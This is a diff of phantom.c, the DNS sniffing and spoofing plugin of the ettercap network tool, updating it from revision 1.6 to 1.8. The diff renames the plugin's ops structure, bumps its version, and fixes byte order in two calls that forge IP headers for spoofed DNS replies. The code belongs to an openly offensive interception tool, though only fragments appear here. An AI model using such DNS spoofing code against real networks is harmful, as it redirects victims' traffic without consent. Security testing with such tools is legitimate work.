@@ -17,7 +17,7 @@
     along with this program; if not, write to the Free Software
     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 
-    $Id: phantom.c,v 1.6 2001/12/20 20:09:45 alor Exp $
+    $Id: phantom.c,v 1.8 2002/02/22 19:48:56 alor Exp $
 */
 
 #include <stdlib.h>
@@ -120,10 +120,10 @@ int phantom(void *);
 
 // plugin operation
 
-struct plugin_ops ops = {
+struct plugin_ops phantom_ops = {
    ettercap_version: VERSION,
    plug_info:        "Sniff/Spoof DNS requests",
-   plug_version:     15,
+   plug_version:     16,
    plug_type:        PT_EXT,
    hook_point:       HOOK_NONE,
    hook_function:    &phantom,
@@ -133,7 +133,7 @@ struct plugin_ops ops = {
 
 int Plugin_Init(void *params)
 {
-   return Plugin_Register(params, &ops);
+   return Plugin_Register(params, &phantom_ops);
 }
 
 int Plugin_Fini(void *params)
@@ -271,7 +271,7 @@ void Parse_Packet(char *buf, int sock, char *MyMAC)
                   datalen = ntohs(udp->len) - UDP_HEADER + 16;
 
                   Inet_Forge_ethernet(buf, MyMAC, eth->source_mac, ETH_P_IP);
-                  Inet_Forge_ip(buf + ETH_HEADER, ip->dest_ip, ip->source_ip, ntohs(ip->t_len)-IP_HEADER+16, ntohs(ip->ident)+1, ip->frag_and_flags, IPPROTO_UDP);
+                  Inet_Forge_ip(buf + ETH_HEADER, ip->dest_ip, ip->source_ip, ntohs(ip->t_len)-IP_HEADER+16, ntohs(ip->ident)+1, ntohs(ip->frag_and_flags), IPPROTO_UDP);
 
                   dns->qr = dns->ra = 1;
                   dns->num_answer = htons(1);
@@ -303,7 +303,7 @@ void Parse_Packet(char *buf, int sock, char *MyMAC)
                   datalen = ntohs(udp->len) - UDP_HEADER + 12 + rlen;
 
                   Inet_Forge_ethernet(buf, MyMAC, eth->source_mac, ETH_P_IP);
-                  Inet_Forge_ip(buf + ETH_HEADER, ip->dest_ip, ip->source_ip, ntohs(ip->t_len)-IP_HEADER+12+rlen, ntohs(ip->ident)+1, ip->frag_and_flags, IPPROTO_UDP);
+                  Inet_Forge_ip(buf + ETH_HEADER, ip->dest_ip, ip->source_ip, ntohs(ip->t_len)-IP_HEADER+12+rlen, ntohs(ip->ident)+1, ntohs(ip->frag_and_flags), IPPROTO_UDP);
 
                   dns->qr = dns->ra = 1;
                   dns->aa = 1;
